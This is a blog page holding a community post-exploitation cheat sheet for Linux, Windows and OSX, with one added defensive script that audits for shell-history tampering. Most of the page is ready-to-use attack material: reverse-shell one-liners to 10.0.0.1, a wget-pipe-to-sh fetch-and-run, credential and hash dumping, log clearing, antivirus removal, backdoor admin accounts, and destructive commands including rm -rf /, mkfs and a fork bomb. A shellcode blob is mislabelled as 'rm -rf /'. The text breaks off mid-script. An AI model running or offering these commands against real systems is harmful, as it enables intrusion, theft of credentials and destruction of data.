Sam Stelfox

Thoughts from a software engineer, systems hacker and Linux gubernāre.

Post-Exploitation

Linux/Unix/BSD Command List

The latest Linux/Unix/BSD, OSX, and Windows docs here: https://bitly.com/nuc0N0

Blind Files

Things to pull when all you can do is blindly read, LFI/Dir traversal (Don’t forget %00!)

| File | Contents/Reason |
|---|---|
| /etc/resolv.conf | Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd |
| /etc/motd | Message of the Day |
| /etc/issue | Usually contains current version of distro |
| /etc/passwd | List of users as well |
| /etc/shadow | List of users’ passwords’ hashes (requires root) |

System
Command   Description and/or Reason
uname -a    Prints the kernel version, arch, sometimes distro, ...  
ps aux  List all running processes
top -n 1 -b 
id  
arch        
w     who is connected, uptime and load avg
who -a  uptime, runlevel, tty, processes etc.
gcc -v    
mysql --version     
perl -v   
ruby -v 
python --version          
df -k mounted fs, size, % use, dev and mount point
mount mounted fs    
last -a 
lastcomm      
lastlog       
lastlogin (BSD)     
getenforce  
dmesg   
lspci 
lsusb 
lshw  
free -m     
cat /proc/cpuinfo     
cat /proc/meminfo 
du -h --max-depth=1 /   
which nmap  locate a command (in this case, nmap)
locate bin/nmap 
which nc      
locate bin/nc     
whoami  
jps -l  
java -version
Networking
hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
iptables -t nat -L -n
ip6tables -L -n
iptables-save
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi

to resume it → “cat /proc/net/*” (more discreet)
what does the above mean?
Configs
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
cat /etc/exports
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers
Determine Distro
lsb_release -d            # Generic cmd for all LSB distros
/etc/lsb-release          # Generic config for all LSB distros
/etc/issue            # Generic but often modified
cat /etc/*release
/etc/SUSE-release           # Novell SUSE     
/etc/redhat-release, /etc/redhat_version    # Red Hat
/etc/fedora-release           # Fedora
/etc/slackware-release, /etc/slackware-version  # Slackware
/etc/debian_release, /etc/debian_version,     # Debian
/etc/mandrake-release         # Mandrake
/etc/sun-release          # Sun JDS
/etc/release            # Solaris/Sparc
/etc/gentoo-release           # Gentoo
/etc/rc.conf            # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a (often hints at it pretty well)
Installed Packages
rpm -qa --last | head
yum list | grep installed
dpkg -l   
dpkg -l | grep -i "linux-image"
pkg_info # FreeBSD
equery list '*' # on Gentoo, but ‘equery’ needs to be installed, so use "cd /var/db/pkg/ && ls -d */*" instead
Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf
Finding Important Files
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; tree
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep '[.]tar$'
locate tgz | grep '[.]tgz$'
locate sql | grep '[.]sql$'
locate settings | grep '[.]php$'
locate config.inc | grep '[.]php$'
ls /home/*/id*
locate .properties | grep '[.]properties' # java config files
locate .xml | grep '[.]xml' # java/.net config files
find /sbin /usr/sbin /opt /lib $(echo "$PATH" | sed 's/:/ /g') -perm -4000 # find suids
locate rhosts
Covering Your Tracks
Avoiding history files
export HISTFILE=

This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out: 
rm -rf ~/.bash_history && ln -s /dev/null ~/.bash_history (invasive)
touch ~/.bash_history (invasive)
<space> history -c (using a space before a command) 
zsh% unset HISTFILE HISTSIZE  
t?csh% set history=0  
bash$ set +o history
ksh$ unset HISTFILE

Note that you’re probably better off modifying or temporarily disabling rather than deleting history files; it leaves far fewer traces and is less suspicious.
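From the defender's side, the history tricks above leave on-disk artifacts that can be checked for: a history file replaced by a symlink, a zero-length history file, or a shell startup file that switches history off. The audit below is an added example, not part of the original list; the function names and the demo home-directory tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original list): look for on-disk artifacts of
# the history-evasion commands above. All names here are illustrative.

# Startup-file lines that switch shell history off (bash/zsh/ksh/csh forms).
HIST_OFF_RE='^[[:space:]]*(export[[:space:]]+)?(HISTFILE=(/dev/null)?|HISTSIZE=0|HISTFILESIZE=0)[[:space:]]*$'
HIST_OFF_RE="$HIST_OFF_RE"'|^[[:space:]]*unset[[:space:]]+(.*[[:space:]])?HISTFILE'
HIST_OFF_RE="$HIST_OFF_RE"'|^[[:space:]]*set[[:space:]]+(\+o[[:space:]]+history|history=0)'

# audit_history <home_root>
# Prints one finding per line: KIND<TAB>path<TAB>detail
audit_history() {
    local root home f rc target line
    root=$1
    for home in "$root"/*/; do
        [ -d "$home" ] || continue
        home=${home%/}
        for f in "$home"/.bash_history "$home"/.zsh_history \
                 "$home"/.sh_history "$home"/.history; do
            if [ -L "$f" ]; then
                # History replaced by a symlink, typically to /dev/null
                target=$(readlink "$f")
                printf 'SYMLINK\t%s\t-> %s\n' "$f" "$target"
            elif [ -f "$f" ] && [ ! -s "$f" ]; then
                # Deleting and re-creating the file leaves zero bytes behind
                printf 'EMPTY\t%s\tzero-length history file\n' "$f"
            fi
        done
        for rc in "$home"/.bashrc "$home"/.bash_profile "$home"/.profile \
                  "$home"/.zshrc "$home"/.kshrc "$home"/.cshrc "$home"/.tcshrc; do
            [ -f "$rc" ] || continue
            # Persistent settings that disable history at every login
            grep -nE "$HIST_OFF_RE" "$rc" | while IFS= read -r line; do
                printf 'RCFILE\t%s\t%s\n' "$rc" "$line"
            done
        done
    done
    return 0
}

# Constructed sample homes: one clean user and three with artifacts.
build_demo_tree() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/alice" "$root/bob" "$root/carol" "$root/dave"
    printf 'ls -la\ncd /tmp\n' > "$root/alice/.bash_history"
    printf 'HISTSIZE=5000\nHISTFILE=~/.bash_history\n' > "$root/alice/.bashrc"
    ln -s /dev/null "$root/bob/.bash_history"
    : > "$root/carol/.bash_history"
    printf 'alias ll="ls -l"\nexport HISTFILE=\n' > "$root/dave/.bashrc"
    printf 'unset HISTFILE HISTSIZE\n' > "$root/dave/.zshrc"
    printf '%s\n' "$root"
}

# Demo run against the constructed tree.
demo_root=$(build_demo_tree)
audit_history "$demo_root"
rm -rf "$demo_root"
```

Point `audit_history` at `/home` (or `/Users`) on the host being examined. Changes made only inside a live session, such as `set +o history` or a leading space, leave nothing on disk, so process auditing is still needed to catch those.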
Obtain users’ information
ls -alh /home/*/  
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist* # you can learn a lot from this
find /home/*/.vnc /home/*/.subversion -type f
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l
cat /home/*/.mysql_history
Escalating
Looking for possible opened paths

ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/* /var/spool/cron/*
lsof -nPi
ls /home/*/.ssh/*
Maintaining Control
Reverse Shell
Starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 (No /dev/tcp on Debian, but use nc, TCL, awk or any interpreter like Python, and so on.).
perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many do NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1 
Listener- Xnest :1
Add permission to connect- xhost +victimIP
ssh -NR 3333:localhost:22 [email protected]
nc -e /bin/sh 10.0.0.1 1234
Fun if Windows is present and accessible
If Windows is installed and the logged-in user's access level includes the Windows partitions, an attacker can mount them and do much deeper information gathering, credential theft and rooting. ntfs-3g is useful for mounting NTFS partitions read-write.
TODO: insert details on what to look for
Stuff to be sorted

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
Command   Output
uname -a    Linux kernel version, usually distribution too
ps aux      List of running processes
id  List current user and group along with user/group id    
w Show info about who is logged in and what they are doing
who -a  Print information about users   
cat /dev/core > /dev/audio

cat /dev/mem > /dev/audio Makes a sound from the memory content.
Usefulness of this???
Deleting and Destroying
(If it is necessary to leave the machine inaccessible or unusable)
Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into trouble.

Oh, and you’re probably a jerk if you use any of the stuff below.
Command Description
rm -rf /  This will recursively try to delete all files.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;   Hex version of rm -rf / 
How is this supposed to work?
mkfs.ext3 /dev/sda  Reformat the device mentioned, making recovery of files hard.   
chmod -R 000 /  Files are not lost but only accessible from another system, or a live distro. Nobody will be able to login, nor shut the computer down, and if forcibly shut down it won’t start again.
Execute a remote script

This command forces the download of a file and immediately its execution, can be exploited easily using or reverse shell exploit

wget http://server/file.sh -O- | sh
Fork Bomb

The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.

:(){:|:&};: 

Windows Post-Exploitation Command List

Blind Files

(Things to pull when all you can do is to blindly read) LFI/Directory traversal(s).
Files that will have the same name across networks / Windows domains / systems.
File  Expected Contents / Description
%SYSTEMDRIVE%\boot.ini  A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini  This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case.
%SYSTEMROOT%\repair\SAM It stores users' passwords in a hashed format (in LM hash and NTLM hash).
%SYSTEMROOT%\repair\system  
>insert new rows above this line< SEE IMPORTANT FILES SECTION FOR MORE IDEAS

Non Interactive Command Execution

System

Command Expected Output or Description
whoami  Lists your current user. Not present in all versions of Windows; however shall be present in Windows NT 6.0-6.1.
whoami /all Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.
set Shows all current environmental variables. Specific ones to look for are USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE.
systeminfo (XP+)  Outputs a large amount of data about the system, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed
qwinsta (XP, 2000, + ?) Displays information about RDP sessions. /CONNECT can be added, but is usually not needed to gain the information you need.
qprocess *  Much like tasklist, but a bit easier to read. It has username, login method, session id, pid, and binary name. 
at  Shows currently scheduled tasks via ‘at’. Even though schtasks is the new way of doing things admin wise, pentesters can still use ‘at’ to get system level shells even through Win7x64 systems.
schtasks (XP+)  Lists all the currently scheduled tasks that your current user has access to see. This is the big deviation from ‘at’. Each user can have their own scheduled tasks now.
schtasks /query /fo csv /v > %TEMP% Outputs the list of services in verbose csv format. Good for throwing in temp and pulling down for a closer look.
net start

OR

sc  Lists services
-> sc getkeyname "XXXXX"  You can use the name you got from ‘net start’ to get the ‘key name’ of the service you want more information on.
--> sc queryex "XXXXX"  Using the keyname you obtained from ‘getkeyname’, you can query the status, pid and other information about the service.
net config workstation  This will display information such as NetBIOS name, the full computer name, Username (of the user executing this command), Domain, Workgroups, and more.
net time  
net file  
net session 
net use Used to map network shares, such as the C:\ drive.
tasklist (XP+)  Is equivalent to using Taskmanager, though visible as console output instead with PID’s too.
tasklist /m  or tasklist /m blah.dll  Lists all of the ‘modules’ (binary: exe, dll, com or any other PE based code that was executed) for each process, or if a module is specified then tasklist will only list the processes with that specific module running. Great for finding processes running crypto or other specific function dlls
tasklist /svc Lists processes and their accompanying service keyname if they are parented by a service
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>  Kill processes by name or pid (with force option)
fsutil fsinfo drives  Must be an administrator to run this, but it lists the current drives on the system.

Networking (ipconfig, netstat, net)

Command Expected Output or Description
ipconfig /all Displays the full information about your NIC’s.
ipconfig /displaydns  Displays your local DNS cache.
netstat -bano 
netstat -s -p [tcp|udp|icmp|ip]
netstat -r  
netstat -na | findstr :445  
netstat -nao | findstr LISTENING  XP and up for -o flag to get PID
netstat -na | findstr LISTENING 
netsh diag show all 
net view  Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup.
net view /domain  
net view /domain:otherdomain  
net user %USERNAME% /domain Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain  Lists all of the domain users
net accounts  Prints the password policy for the local system. This can be different and superseded by the domain policy.
net accounts /domain  Prints the password policy for the domain
net localgroup administrators Prints the members of the Administrators local group
net localgroup administrators /domain as this was supposed to use localgroup & domain, this is actually another way of getting *current* domain admins
net group "Domain Admins" /domain Prints the members of the Domain Admins group
net group "Enterprise Admins" /domain Prints the members of the Enterprise Admins group
net group "Domain Controllers" /domain  Prints the list of Domain Controllers for the current domain
nbtstat -a [ip here]  
net share Displays your currently shared SMB entries, and what path(s) they point to.
net session | find / “\\” 
arp -a  Lists all the systems currently in the machine’s ARP table. 
route print Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
browstat (Not working on XP)  

http://www.securityaegis.com/ntsd-backdoor/

Configs

Command Expected Output or Description
gpresult /z Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc qc 
sc query  
sc queryex  
type %WINDIR%\System32\drivers\etc\hosts  Print the contents of the Windows hosts file
dir %PROGRAMFILES%  Prints a directory listing of the Program Files directory.
echo %COMSPEC%  Usually going to be cmd.exe in the Windows directory, but it’s good to know for sure.

Finding Important Files

Command Description / Reason
tree C:\ /f /a > C:\output_of_tree.txt  Prints a directory listing in ‘tree’ format. The /a makes the tree printed with ASCII characters instead of special ones and the /f displays file names as well as folders
dir /a  
dir /b /s [Directory or Filename] 
dir \ /s /b | find /I "searchstring"  Searches the output of dir from the root of the current drive (\) and all subdirectories (/s) using the ‘base’ format (/b) so that it outputs the full path for each listing, for ‘searchstring’ anywhere in the file name or path.
command | find /c /v "" Counts the lines of whatever you use for ‘command’

Files To Pull (if possible)

File location Description / Reason
%SYSTEMDRIVE%\pagefile.sys  Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size
%WINDIR%\debug\NetSetup.log 
%WINDIR%\repair\sam 
%WINDIR%\repair\system  
%WINDIR%\repair\software  
%WINDIR%\repair\security  
%WINDIR%\iis6.log (5, 6 or 7) 
%WINDIR%\system32\logfiles\httperr\httperr1.log 
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day) 
%WINDIR%\system32\config\AppEvent.Evt 
%WINDIR%\system32\config\SecEvent.Evt 
%WINDIR%\system32\config\default.sav  
%WINDIR%\system32\config\security.sav 
%WINDIR%\system32\config\software.sav 
%WINDIR%\system32\config\system.sav 
%WINDIR%\system32\CCM\logs\*.log  
%USERPROFILE%\ntuser.dat  
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat 
%WINDIR%\System32\drivers\etc\hosts 

Remote System Access

Command Description / Reason
net share \\computername  
tasklist /V /S computername 
qwinsta /SERVER:computername  
qprocess /SERVER:computername * 
net use \\computername  This maps IPC$ which does not show up as a drive but allows you to access the remote system as the current user. This is less helpful as most commands will automatically make this connection if needed
net use \\computername /user:DOMAIN\username password Using the IPC$ mount with a user name and password allows you to access commands that do not usually ask for a username and password as a different user in the context of the remote system.

This is useful when you’ve gotten credentials from somewhere and wish to use them but do not have an active token on a machine you have a session on.

net time \\computername (Shows the time of target computer)
dir \\computername\share_or_admin_share\   (dir list a remote directory)
tasklist /V /S computername
Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount

Auto-Start Directories

ver (Returns kernel version - like uname on *nix)

| Windows version | Auto-start directory |
|---|---|
| Windows NT 6.1, 6.0 | %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ |
| Windows NT 5.2, 5.1, 5.0 | %SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\ |
| Windows 9x | %SystemDrive%\WINDOWS\Start Menu\Programs\StartUp\ |
| Windows NT 4.0, 3.51, 3.50 | %SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\ |

WMI

wmic bios
wmic qfe
wmic qfe get hotfixid  (This gets patch IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create "process_name" (executes a program)
wmic process where name="process_name" call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? to get help!)
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)

Reg Command 

reg save HKLM\Security security.hive  (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)
reg add [\\TargetIPaddr\] [RegDomain][ \Key ] 
reg export [RegDomain]\[Key] [FileName] 
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can add /s to recurse all values)

Deleting Logs

wevtutil el  (list logs)
wevtutil cl <LogName> (Clear specific log)
del %WINDIR%\*.log /a /s /q /f

Uninstalling Software “AntiVirus” (Non interactive)

wmic product get name /value (this gets software names)
wmic product where name="XXX" call uninstall /Interactive:Off (this uninstalls software)

# Other  (to be sorted)

pkgmgr /iu:"Package" (useful)
pkgmgr /iu:"TelnetServer" (Install Telnet Service ...)
pkgmgr /iu:"TelnetClient" (Client)
rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>
xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff

OS SPECIFIC

Win2k3

winpop stat domainname

Vista/7

winstat features
wbadmin get status
wbadmin get items
gpresult /H gpols.htm
bcdedit /export <filename>

Vista SP1/7/2008/2008R2 (x86 & x64)

Enable/Disable Windows features with Deployment Image Servicing and Management (DISM):
*Note* Works well after bypassuac + getsystem (requires system privileges)
*Note2* For Dism.exe to work on x64 systems, the long commands are necessary

To list features which can be enabled/disabled:
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features

To enable a feature (TFTP client for example):
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP

To disable a feature (again TFTP client):
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP

Invasive or Altering Commands

These commands change things on the target and can lead to getting detected
Command Description
net user hacker hacker /add Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
net localgroup administrators /add hacker
or
net localgroup administrators hacker /add Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimited  Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) Windows versions, share permissions and file permissions are separated. Since we added ourselves as a local admin this isn’t a problem but it is something to keep in mind
net user username /active:yes /domain Changes an inactive / disabled account to active. This can be useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable Disables the local windows firewall
netsh firewall set opmode enable  Enables the local Windows firewall. If rules are not in place for your connection, this could cause you to lose it.

Support Tools Binaries / Links / Usage

Command Link to download  Description

Third Party Portable Tools

 (must be contained in a single executable)

REMEMBER: DO NOT RUN BINARIES YOU HAVEN’T VETTED - BINARIES BELOW ARE NOT BEING VOUCHED FOR IN ANY WAY AS THIS DOCUMENT CAN BE EDITED BY ANYONE
Command Link to download  Description
carrot.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp /dialup /pwdump http://h.ackack.net/carrot-exe.html -invasive- Recovers a bunch of passwords.
PwDump7.exe > ntlm.txt  http://www.tarasco.org/security/pwdump_7/ -invasive- Dumps Windows NTLM hashes. Holds the credentials for all accounts.
http://www.nirsoft.net/utils/nircmd.html  A collection of small nifty features.
wce.exe http://www.ampliasecurity.com/research/wce_v1_2.tgz Pull NTLM hashes from login sessions out of memory, steal Kerberos tickets from active processes and apply them to others.

(Page break just so we can have the straight up cmds on their own)

Meterpreter Commands
ps  (show running processes and their associated users/id numbers)
getuid  
getpid  
getprivs  (shows current privileges)
getsystem Attempts to get SYSTEM using 4 methods, the last being a local exploit called Kitrap0d. This can sometimes be caught by host based IDS systems and even in rare occasions blue screen the machine.
getsystem - (place holder for targeted getsys) If anyone wants to fill this in before I can please do
sysinfo 
timestomp Remove/screw up timestamps; if you are good enough, this messes up audit tools
clearev Clear A
hashdump  dump SAM file hashes for pass the hash or cracking
migrate [pid] Move from exploited process into another process

Useful Meterpreter Scripts
killav.rb (Meterpreter script that kills all Antivirus processes.)
winenum.rb (Retrieves all kinds of information about the system including environment variables, network interfaces, routing, user accounts, and much more.)
scraper.rb (harvest system info including network shares, registry hives and password hashes.)
persistence.rb (Meterpreter Script for creating a persistent backdoor on a target host.)
keylogrecorder.rb (This script will start the Meterpreter Keylogger and save all keys.)
getgui.rb (Windows Remote Desktop Enabler Meterpreter Script.)
For a complete list please see: http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/

Useful Meterpreter Post Modules

post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
post/windows/escalate/bypassuac (mixed results)

Useful Multi-Step Techniques

“Pass The Hash” attack (Gain access to other computers with stolen hashes, no cracking involved)
Token impersonation via incognito

OSX Post-Exploitation Command List

Blind Files 

(things to pull when all you can do is blindly read) LFI/dir traversal
/etc/resolv.conf (everyone always has read on this and it won’t trigger an IDS)

SYSTEM

uname -a
sw_vers -productName
sw_vers -productVersion
system_profiler
id
printenv
who
ps aux
ps ea
dscl localhost -read /Search/Users/bob (read password hash of bob)
dscl localhost -read /Search/Users/bob ShadowHashData | tail -1 | xxd -r -p | plutil -convert xml1 -o - - (Dump in workable format)
dscl localhost -passwd /Search/Users/bob (change bob’s password without needing current)
"/Library/Application Support/VMware Fusion/vmrun" list
"/Library/Application Support/VMware Fusion/vmrun" CopyFileFromHostToGuest windowsmalicious.exe aWindowsVM
"/Library/Application Support/VMware Fusion/vmrun" captureScreen WindowsVM
Snow Leopard and Lion
dscacheutil -q user
dscacheutil -q group
Tiger
lookupd -q user
lookupd -q group

Networking

ifconfig
netstat -np tcp
netstat -np udp

Configs

ls -alh /private/etc/
ls -alh "/Library/Application Support/VMware Fusion/"

Packages

port installed
ls -alh /Applications/

Finding Important Files

ls -ma ~/
ls -alh /Users/
ls -alh /Users/*/.ssh/
ls -alh /Users/*/.gnupg/
ls -alh /Volumes/

Files to pull

Remote System Access

Priv

cat "/Library/Application Support/Objective Development/Little Snitch/rules.xpl"
ipfw list

The current Linux list: 
(let’s remove anything that doesn’t work (or doesn’t mean anything) on OS X)

# System
uname -a
ps aux
ps -aef
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a

lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
free -m
du -h --max-depth=1 /
which nmap (see if it’s already installed)
locate bin/nmap
which nc (see if it’s already installed)
locate bin/<whatever you want>
whoami
jps -l
java -version

# Networking
hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi

# Configs
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/samba/smb.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_maste
cat /etc/fstab
cat /etc/exports
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers

#Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat  /etc/yum.conf

# Finding Important Files
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /Volumes
ls -alhtr /tmp
ls -alhtr /home
ls /Users/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep '[.]tar$'
locate tgz | grep '[.]tgz$'
locate sql | grep '[.]sql$'
locate settings | grep '[.]php$'
locate config.inc | grep '[.]php$'
ls /Users/*/id*
locate .properties | grep '[.]properties' # java config files
locate .xml | grep '[.]xml' # java/.net config files
find /sbin /usr/sbin /opt /lib $(echo "$PATH" | sed 's/:/ /g') -perm -4000 # find suids

# Per User
ls -alh /Users/*/
ls -alh /Users/*/.ssh/
cat /Users/*/.ssh/authorized_keys
cat /Users/*/.ssh/known_hosts
cat /Users/*/.*hist*
find /Users/*/.vnc /Users/*/.subversion -type f
grep ^ssh /Users/*/.*hist*
grep ^telnet /Users/*/.*hist*
grep ^mysql /Users/*/.*hist*
cat /Users/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l

# Priv (sudo’d or as root)
ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/*
lsof -nPi
ls /Users/*/.ssh/*

# Reverse Shell
starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # No /dev/tcp on Mac OS X
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many do NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1
Listener-     Xnest :1
Add permission to connect-  xhost +victimIP

Persistence

Branching out once inside

Good

Better

  * What if cmd.exe is disabled?
    * Drop a binary (last resort)
    * Use the underlying API
    * Railgun
  * User Discovery
    * Good
      * net group "domain admins" /domain
      * net group "domain admins" /domain:DM
      * net localgroup Administrators
      * net group localgroup Administrators /domain
      * net user domainadmin_username /domain
      * net user username /domain
    * Better
      * rpcclient - enumerate users
        ```
        #!/bin/bash
        for i in {500..600}; do
